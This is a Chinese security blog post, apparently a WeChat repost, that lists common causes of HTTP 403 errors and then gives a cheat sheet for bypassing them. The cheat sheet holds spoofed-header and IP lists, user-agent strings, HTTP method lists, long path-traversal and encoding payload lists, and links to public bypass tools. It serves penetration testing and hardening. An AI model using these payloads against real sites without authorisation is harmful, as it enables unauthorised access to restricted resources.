Tips +1
关于 403 页面
403页面是Web服务器返回的HTTP状态码之一,表示服务器已经理解客户端(通常是浏览器)的请求,但出于某种原因拒绝了该请求。当客户端尝试访问受限资源或执行未经授权的操作时,服务器会返回403错误状态码,以向客户端指示拒绝访问。
常见的403错误的情况包括但不限于:
-
缺少访问权限:客户端尝试访问一个需要特定身份验证或权限的资源,但提供的凭据不足以获得访问权限,导致服务器返回403错误。
-
IP地址被拒绝:服务器配置了IP地址过滤规则,拒绝了特定IP地址或IP地址范围的访问。这通常用于限制特定的来源或区域访问网站。
-
文件或目录权限设置:客户端请求的资源是一个文件或目录,但服务器没有授予客户端访问该文件或目录的权限,导致返回403错误。
-
目录浏览禁止:服务器配置禁止目录浏览功能,当客户端试图直接访问一个目录时,服务器返回403错误,阻止目录列表的显示。
-
防火墙或安全设备拦截:网络中的防火墙、Web应用防火墙(WAF)或其他安全设备可能检测到可疑的请求,阻止了客户端的访问,导致403错误。
-
访问限制策略:服务器可能配置了访问控制策略,限制了特定类型的请求或HTTP方法,导致无法执行某些操作而返回403错误。
-
防止目录遍历:服务器可能配置了防止目录遍历功能,阻止客户端访问应用程序目录外的资源,避免遭受安全漏洞。
-
请求频率限制:为了防止DDoS攻击或恶意请求,服务器可能实施了请求频率限制策略,当客户端发送过多请求时,服务器会返回403错误。
-
未登录或会话过期:对于需要登录的资源,如果客户端未登录或会话过期,服务器可能会返回403错误,要求用户先进行登录。
-
URL重写或重定向问题:可能由于URL重写或重定向配置不当,导致客户端请求的资源被阻止访问,从而返回403错误。
-
CSRF保护:网站实施了跨站请求伪造(CSRF)保护措施,但客户端提交的请求缺少有效的CSRF令牌,导致服务器拒绝访问并返回403错误。
-
请求头不正确:某些Web服务器或应用程序可能要求请求包含特定的头部信息,如果请求未包含所需的头部信息,服务器可能返回403错误。
-
网站维护模式:网站管理员可能将网站设置为维护模式,以进行系统更新或修复漏洞,此时访问网站会返回403错误。
-
恶意行为或黑名单:服务器可能将某些客户端IP地址列入黑名单,因为它们被认为有恶意行为,导致这些IP地址的访问请求被拒绝。
-
CDN配置问题:当使用内容分发网络(CDN)时,可能出现配置问题导致请求被CDN服务器拦截并返回403错误。
-
URL参数错误:某些应用程序可能对URL参数有特定的要求,如果请求的URL参数不符合要求,服务器可能返回403错误。
-
安全插件或模块配置:服务器可能配置了一些安全插件或模块,用于防止特定类型的攻击,如果请求被插件或模块拦截,服务器会返回403错误。
-
用户被禁用:对于网站用户账户,可能存在某些限制或封禁情况,当用户处于被禁用状态时,访问网站会返回403错误。
403 的绕过手段
host头绕过header 头绕过(代理IP绕过覆盖请求URL绕过)protocol 绕过useragents 绕过port 绕过大小写绕过httpmothed 方法绕过encode 绕过extensions 绕过midpaths 绕过endpaths 绕过
host 头绕过
通过修改Host头部,攻击者可能绕过服务器对特定Host的限制或防御措施,从而访问受限资源或执行未经授权的操作。
把host值修改为子域名
收集一个资产的相关ip,使用ip来绕过。
header 头绕过
如:代理IP绕过、覆盖请求URL、绕过IP限制
Access-Control-Allow-Origin:
Base-Url:
CF-Connecting_IP:
CF-Connecting-IP:
Client-IP:
Cluster-Client-IP:
Destination:
Forwarded-For-Ip:
Forwarded-For:
Forwarded-Host:
Forwarded:
Host:
Http-Url:
Origin:
Profile:
Proxy-Host:
Proxy-Url:
Proxy:
Real-Ip:
Redirect:
Referer:
Referrer:
Request-Uri:
True-Client-IP:
Uri:
Url:
X-Arbitrary:
X-Client-IP:
X-Custom-IP-Authorization:
X-Forward-For:
X-Forward:
X-Forwarded-By:
X-Forwarded-For-Original:
X-Forwarded-For:
X-Forwarded-Host:
X-Forwarded-Proto:
X-Forwarded-Server:
X-Forwarded:
X-Forwarder-For:
X-Host:
X-HTTP-DestinationURL:
X-HTTP-Host-Override:
X-Original-Remote-Addr:
X-Original-URL:
X-Originally-Forwarded-For:
X-Originating-IP:
X-Proxy-Url:
X-ProxyUser-Ip:
X-Real-Ip:
X-Real-IP:
X-Referrer:
X-Remote-Addr:
X-Remote-IP:
X-Rewrite-URL:
X-True-IP:
X-WAP-Profile:
IP:
*
0
0.0.0.0
0177.0000.0000.0001
0177.1
0x7F000001
10.0.0.0
10.0.0.1
127.0.0.1
127.0.0.1:443
127.0.0.1:80
127.1
172.16.0.0
172.16.0.1
172.17.0.1
192.168.0.2
192.168.1.0
192.168.1.1
2130706433
8.8.8.8
localhost
localhost:443
localhost:80
norealhost
null
protocol 绕过
协议版本更改(从 HTTP 1.2、降级到 HTTP 1.1 等)
用HTTP协议的1.0版本来绕过403案例:https://mp.weixin.qq.com/s/fgozZQRCqGznvuc3X_WIeA
UserAgents 绕过
User-Agent头部通常包含了发送请求的客户端类型、操作系统、浏览器版本等信息,服务器根据这些信息来判断如何响应请求。
攻击者使用工具或手动方式修改HTTP请求的User-Agent字段,将其设置为目标服务器预期的合法用户代理或客户端类型。绕过服务器对特定User-Agent的限制或防御措施,从而访问受限资源或执行未经授权的操作。
Apple iPhone v1.1.4 CoreMedia v1.0.0.4A102
Apple-PubSub/65.1.1
ArabyBot (compatible; Mozilla/5.0; GoogleBot; FAST Crawler 6.4; http://www.araby.com;)
curl/7.10.x (i386-redhat-linux-gnu) libcurl/7.10.x OpenSSL/0.9.7a ipv6 zlib/1.1.4
curl/7.7.x (i386--freebsd4.3) libcurl 7.7.x (SSL 0.9.6) (ipv6 enabled)
curl/7.8 (i686-pc-linux-gnu) libcurl 7.8 (OpenSSL 0.9.6)
curl/7.9.x (win32) libcurl 7.9.x
del.icio.us-thumbnails/1.0 Mozilla/5.0 (compatible; Konqueror/3.4; FreeBSD) KHTML/3.4.2 (like Gecko)
Firefox ([email protected])
Firefox_1.0.6 ([email protected])
libcurl-agent/1.0
Microsoft_Internet_Explorer_5.00.438 ([email protected])
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Deepnet Explorer)
Mozilla/5.0
Mozilla/5.0 (+http://www.eurekster.com/mammoth) Mammoth/0.1
Mozilla/5.0 (+http://www.sli-systems.com/) Mammoth/0.1
Mozilla/5.0 (Clustered-Search-Bot/1.0; [email protected]; http://www.clush.com/)
Mozilla/5.0 (compatible) GM RSS Panel X
Mozilla/5.0 (compatible; +http://www.evri.com/evrinid)
Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/spider.html;) Gecko/2008032620
Referer 标头绕过
网站限制了访问来源,如果访问来源不符合,则也会返回403
Referer请求头包含了当前请求页面的来源页面的地址,即表示当前页面是通过此来源页面里的链接进入的。服务端一般使用Referer请求头识别访问来源
Request
GET /auth/login HTTP/1.1
Host: xxx
Response
HTTP/1.1 403 Forbidden
Reqeust
GET / HTTP/1.1
Host: xxx
ReFerer:https://xxx/auth/login
Response
HTTP/1.1 200 OK
or
Reqeust
GET /auth/login HTTP/1.1
Host: xxx
ReFerer:https://xxx/auth/login
Response
HTTP/1.1 200 OK
port 绕过
X-Forwarded-Port是一个常见的HTTP请求头,用于告知服务器请求是经过代理或负载均衡器传递的,并指示原始请求的端口号。这个头部通常用于在代理或负载均衡环境中识别客户端真实的端口号。
我们可以尝试修改X-Forwarded-Port头部来欺骗服务器,使服务器认为请求来自于其他端口,或绕过一些与特定端口相关的安全控制措施。
X-Forwarded-Port 443 Payload: Status: 000, Length : 0
X-Forwarded-Port 4443 Payload: Status: 000, Length : 0
X-Forwarded-Port 80 Payload: Status: 000, Length : 0
X-Forwarded-Port 8080 Payload: Status: 000, Length : 0
X-Forwarded-Port 8443 Payload: Status: 000, Length : 0
大小写绕过
-
redacted.com/admin -> 403 Forbidden
-
https://redacted.com/Admin -> 200 OK
-
https://redacted.com/aDmin -> 200 OK
案例链接:https://zhuanlan.zhihu.com/p/607735593
httpmethod 方法绕过
验证每个请求的HTTP方法,只允许合法的HTTP方法,如GET、POST、PUT、DELETE等。
OPTIONS
GET
HEAD
POST
PUT
TRACE
PURGE
CONNECT
PROPFIND
PROPPATCH
MKCOL
COPY
MOVE
LOCK
UNLOCK
VERSION-CONTROL
REPORT
CHECKOUT
CHECKIN
UNCHECKOUT
MKWORKSPACE
UPDATE
LABEL
MERGE
BASELINE-CONTROL
MKACTIVITY
ORDERPATCH
ACL
PATCH
SEARCH
ARBITRARY
BIND
LINK
MKCALENDAR
MKREDIRECTREF
PRI
QUERY
REBIND
UNBIND
UNLINK
UPDATEREDIRECTREF
options
get
head
post
put
trace
purge
connect
propfind
proppatch
mkcol
copy
move
lock
unlock
version-control
report
checkout
checkin
uncheckout
mkworkspace
update
label
merge
baseline-control
mkactivity
orderpatch
acl
patch
search
arbitrary
bind
link
mkcalendar
mkredirectref
pri
query
rebind
unbind
unlink
updateredirectref
POUET
TRACK
encode 绕过
#
#?
%
%09
%09%3b
%09..
%09;
%20
%20
%23
%23%3f
%252f%252f
%252f
%26
%2e
%2e%2e
%2e%2e%2f
%2e%2e
%2e
%2f
%2f%20%23
%2f%23
%2f%2f
%2f%3b%2f
%2f%3b%2f%2f
%2f%3f
%2f%3f
%2f
%3b
%3b%09
%3b%2f%2e%2e
%3b%2f%2e%2e%2f%2e%2e%2f%2f
%3b%2f%2e.
%3b%2f..
%3b/%2e%2e/..%2f%2f
%3b/%2e.
%3b/%2f%2f..
%3b/..
%3b//%2f..
%3f
%3f%23
%3f%3f
&
.%2e
..
..%00
..%00/;
..%00;
..%09
..%0d
..%0d/;
..%0d;
..%2f
..%3B
..%5c
..%5c
..%ff
..%ff/;
..%ff;
..
../.
..;
..;%00
..;%0d
..;%ff
..;
..;;
..;\
..;
..\
.
./.
.//.
.;
.;
.html
.json
%20#
%20%20
%20%23
%252e%252e%252f
%252e%252e%253b
%252e%252f
%252e%253b
%252e
%252f
%2e%2e
%2e%2e%3b
%2e%2e
%2e%2f
%2e%3b
%2e%3b/
%2e
%2e/
%2f
%3b
*
*
.
..
..%2f
..%2f..%2f
..%2f..%2f..%2f
..
../..
../../..
../../../
../../
../..//..
../..;
.././..
../.;/..
../
..//..
..//../..
..//..;
../;
../;/..
..;%2f
..;%2f..;%2f
..;%2f..;%2f..;%2f
..;
..;/..
..;/..;
..;/
..;//..
..;//..;
..;/;
..;/;/..;
.
./
.;
.;/
.randomstring
/.
/..
/../..
/..;
/.
/.;
//..
//..
//../
//..;
//..;
//..;/
//
/;
/?anything
;
;/
;x
;x
x/..
x/../
x/../;
x/..;
x/..;/
x/..;/;
x//..
x//..;
x/;/..
x/;/..;
;
;%09
;%09..
;%09..;
;%09;
;%2f%2e%2e
;%2f%2e%2e%2f%2e%2e%2f%2f
;%2f%2f/..
;%2f..
;%2f..%2f%2e%2e%2f%2f
;%2f..%2f..%2f%2f
;%2f..%2f
;%2f..%2f/..%2f
;%2f..%2f/..
;%2f../%2f..%2f
;%2f../%2f..
;%2f..//..%2f
;%2f..//..
;%2f..//
;%2f..///;
;%2f..//;
;%2f..//;/;
;%2f../;/
;%2f../;/;
;%2f../;/;/;
;%2f..;//
;%2f..;//;
;%2f..;/;/
;%2f/%2f..
;%2f//..%2f
;%2f//..
;%2f//..;
;%2f/;/..
;%2f/;/..;
;%2f;//..
;%2f;/;/..;
;/%2e%2e
;/%2e%2e%2f%2f
;/%2e%2e%2f
;/%2e%2e
;/%2e.
;/%2f%2f..
;/%2f/..%2f
;/%2f/..
;/.%2e
;/.%2e/%2e%2e/%2f
;/..
;/..%2f
;/..%2f%2f..
;/..%2f..%2f
;/..%2f
;/..%2f/
;/..
;/../%2f
;/../..
;/../../
;/.././..
;/../.;/..
;/../
;/..//%2e%2e
;/..//%2f
;/..//..
;/..//
;/../;
;/../;/..
;/..;
;/.;.
;//%2f..
;//..
;//../..
;///..
;///..
;///../
;foo=bar
;x
;x
;x;
?
??
???
...
extensions 绕过
基于扩展名,用于绕过403受限制的目录。
.,
.-
.a
.A
.A.
.aac
.accdb
.acgi
.act
.add
.adm
.admin
.Admin
.adp
.ads
.AEFA
.ai
.aj_
.ajax
.alhtm
.all
.alt
.ALT
.ani
.ap
.apf
.api
.apj
.apk
.app
.apsx
.ar
.arc
.arj
.art
.as
.asa
.asax
.asc
.ASC.
midpaths 绕过
通过目录穿越绕过,有些框架通常存在路径遍历漏洞
#
#?
%
%09
%09%3b
%09..
%09;
%20
%20
%23
%23%3f
%252f%252f
%252f
%26
%2e
%2e%2e
%2e%2e%2f
%2e%2e
%2e
%2f
%2f%20%23
%2f%23
%2f%2f
%2f%3b%2f
%2f%3b%2f%2f
%2f%3f
%2f%3f
%2f
%3b
%3b%09
%3b%2f%2e%2e
%3b%2f%2e%2e%2f%2e%2e%2f%2f
%3b%2f%2e.
%3b%2f..
%3b/%2e%2e/..%2f%2f
%3b/%2e.
%3b/%2f%2f..
%3b/..
%3b//%2f..
%3f
%3f%23
%3f%3f
&
.%2e
..
..%00
..%00/;
..%00;
..%09
..%0d
..%0d/;
..%0d;
..%2f
..%3B
..%5c
..%5c
..%ff
..%ff/;
..%ff;
..
../.
..;
..;%00
..;%0d
..;%ff
..;
..;;
..;\
..;
..\
.
./.
.//.
.;
.;
.html
.json
%20#
%20%20
%20%23
%252e%252e%252f
%252e%252e%253b
%252e%252f
%252e%253b
%252e
%252f
%2e%2e
%2e%2e%3b
%2e%2e
%2e%2f
%2e%3b
%2e%3b/
%2e
%2e/
%2f
%3b
*
*
.
..
..%2f
..%2f..%2f
..%2f..%2f..%2f
..
../..
../../..
../../../
../../
../..//..
../..;
.././..
../.;/..
../
..//..
..//../..
..//..;
../;
../;/..
..;%2f
..;%2f..;%2f
..;%2f..;%2f..;%2f
..;
..;/..
..;/..;
..;/
..;//..
..;//..;
..;/;
..;/;/..;
.
./
.;
.;/
.randomstring
/.
/..
/../..
/..;
/.
/.;
//..
//..
//../
//..;
//..;
//..;/
//
/;
/?anything
;
;/
;x
;x
x/..
x/../
x/../;
x/..;
x/..;/
x/..;/;
x//..
x//..;
x/;/..
x/;/..;
;
;%09
;%09..
;%09..;
;%09;
;%2f%2e%2e
;%2f%2e%2e%2f%2e%2e%2f%2f
;%2f%2f/..
;%2f..
;%2f..%2f%2e%2e%2f%2f
;%2f..%2f..%2f%2f
;%2f..%2f
;%2f..%2f/..%2f
;%2f..%2f/..
;%2f../%2f..%2f
;%2f../%2f..
;%2f..//..%2f
;%2f..//..
;%2f..//
;%2f..///;
;%2f..//;
;%2f..//;/;
;%2f../;/
;%2f../;/;
;%2f../;/;/;
;%2f..;//
;%2f..;//;
;%2f..;/;/
;%2f/%2f..
;%2f//..%2f
;%2f//..
;%2f//..;
;%2f/;/..
;%2f/;/..;
;%2f;//..
;%2f;/;/..;
;/%2e%2e
;/%2e%2e%2f%2f
;/%2e%2e%2f
;/%2e%2e
;/%2e.
;/%2f%2f..
;/%2f/..%2f
;/%2f/..
;/.%2e
;/.%2e/%2e%2e/%2f
;/..
;/..%2f
;/..%2f%2f..
;/..%2f..%2f
;/..%2f
;/..%2f/
;/..
;/../%2f
;/../..
;/../../
;/.././..
;/../.;/..
;/../
;/..//%2e%2e
;/..//%2f
;/..//..
;/..//
;/../;
;/../;/..
;/..;
;/.;.
;//%2f..
;//..
;//../..
;///..
;///..
;///../
;foo=bar
;x
;x
;x;
?
??
???
...
endpaths 绕过
添加特殊字符绕过,字符串终止符(%00、0x00、//、;、%、!、?、[] 等)——将它们添加到路径末尾和路径内部
?
??
/
//
/.
/./
/..;/
..;/
..;/
~
°/
#
#/
#/./
#test
%00
%09
%0A
%0D
%20
%20/
%25
%23
%26
%3f
%61
&
-
.
..;
..;
./
/
//
0
1
?
??
???
?WSDL
?debug=1
?debug=true
?param
?testparam
//
debug
false
null
true
~
常用工具
https://github.com/Dheerajmadhukar/4-ZERO-3
https://github.com/iamj0ker/bypass-403
https://github.com/yunemse48/403bypasser
https://github.com/sting8k/BurpSuite_403Bypasser
https://github.com/lobuhi/byp4xx
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【Tips】403 页面绕过的思路总结
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论